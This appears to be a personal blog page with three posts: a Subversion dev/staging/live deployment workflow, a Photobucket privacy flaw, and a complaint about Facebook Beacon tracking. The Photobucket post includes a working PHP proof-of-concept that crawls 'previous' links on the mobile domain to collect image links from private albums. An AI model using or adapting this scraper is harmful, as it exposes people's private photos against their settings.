Joey Adams Dot Net

I won’t go into detail explaining version control, because there are countless articles and papers in the wild about it. I am, however going to explain how I am implementing Subversion into my current development environment.

First, my reasons for using version control

• No SPOF(Single point of failure) -  My flow always has 3 concurrent copies of the source at any given point, so if one machine fails fatily, my project data is still safe.
• Repository - Having a repository means I can revert to older versions if needed, as well as keep up with changes made each step along the way.
• No direct Editing- I never have to touch staging or live servers, I only modify the development copy, so that human error is reduced ten-fold.

Here is how it all works.

I have 3 machines ,   dev/repo/serv  , where dev is my development workstation, repo is the machine hosting the subversion repository, and serv is my http server.

On the http server, in my projects directory, there is a folder for each project I am working on. In the individual project folder, there are 3 other folders, dev/staging/live.

Using Virtual Hosts on httpserv, I make the development folder only accesible by my local network, the staging folder is available by password protection, and the live server is publicly available.

 I use Zend Studio For Eclipse with  a Subversion/PHP Project and use WebDrive to securely map the projects dev folder onto my local machine. I create/edit/modify project files from my workstation (which holds a cache of project files) on the dev folder on my http server.

I edit files from my workstation, and view the changes on the development vhost. Once I finish adding a module/functionality/milestone on the project and want the clients’ approval, I use a script called  svn_sync.sh located in each projects main directory.

Svn_sync.sh, first makes sure you have committed changes to the trunk aka dev folder, after that you specify what source you want to merge and update. Once I finish adding features, I merge the trunk into the staging branch, and update the working copy inside the staging folder. I now can show the client the changes.

Once I have his approval, I run svn_sync.sh again, and have it merge the staging branch into the live branch, and then update the live directory aka The live server.

That is my SDLC (Software development life-cycle). Things are neat and tidy, and I only make changes to the trunk/development folder of the project.

This method is everything I could wish for, High Availability, Reliable, Robust, scalable, and professional.

Sure direct editing and copy -r  work, and I maybe overdoing it as a single developer, but I am very happy with my results and would recommend anyone wanting the experience to do the same.

Photobucket has done it again. It appears that using the mobile-web domain (m55.photobucket.com), if you navigate to a valid image, you can use the previous/next links to view more photos in the account, even if it is set to private.

I have not checked, but I believe the hole has been patched. I was informed of this exploit by a friend Jessie McKnight. The catch to it, was that the prev/next buttons are initially very small (hence mobile web), and clicking all those links take a lot of time.

I hacked up a working script in about an hour, that takes a valid picture URL and visits it, scrapes the previous link, copies the image name and writes it encapsuled in an image tag to a html file using the original photobucket url (not the mobile domain), then it repeats this process on the url obtained by the prev anchor.

This was a very intensive process so I capped it at 50 requests, and storing the pictures on a seperate page allowed for quicker retrievals while the script was crawling, also for saving results from different people using the script at the same time.

This is in no way an optimized script, this was thrown together from scrap to completion in under an hour, but is just a P.O.C

<form method="GET" action=''>
URL TO VALID PICTURE: <input type='text' name='album'><br/>
<input type='submit'>
</form>

<?php

if(isset($_GET['album'])){
$fh = fopen('photos.html','a');
$get_album = $_GET['album'];
$picture = substr(substr($get_album,strrpos($get_album,'/')),1);
$albumurl = substr($get_album,0,strrpos($get_album,'/'));
$album = substr(substr($albumurl,strrpos($albumurl,'/')),1);
$url = "http://m55.photobucket.com/albumview/albums/{$album}/{$picture}.html?";
$i=0;
while($i <= 100){
	$url = getPrevUrl($url);
	$im = getImage($url,$albumurl);
	fwrite($fh,$im);
	echo $im;
	$i++;
}
fclose($fh);
}

function getPrevUrl($url){
  $input = @file_get_contents($url) or die('Could not access file: $url');
  $regexp = "<a\s[^>]*href=(\"??)([^\" >]*?)\\1[^>]*>(.*)<\/a>";
  if(preg_match_all("/$regexp/siU", $input, $matches)) {
	$photoUrl = "http://m55.photobucket.com" . $matches[2][4];
	return $photoUrl;
	}else{
		return $url;
	}
}

function getImage($url,$alburl){
	$photoUrl = substr($url,0,strrpos($url,"."));
	$photoUrl = substr($photoUrl,strrpos($photoUrl,"/"));
	$photoUrl = $alburl . $photoUrl;
	return "<img src='$photoUrl'/><br/>";
}

If you haven’t heard about the beacon in facebook publishing private data, then you have been under a rock. But wait, beacon is now an opt-out service, so this is old news, right?

Wrong!

According to a post on slashdot, beacon still tracks you whether you are logged into facebook or not. I had high hopes for facebook, being an advocate of php and open source technology, but shame, shame on you facebook.

This issue needs more spotlight.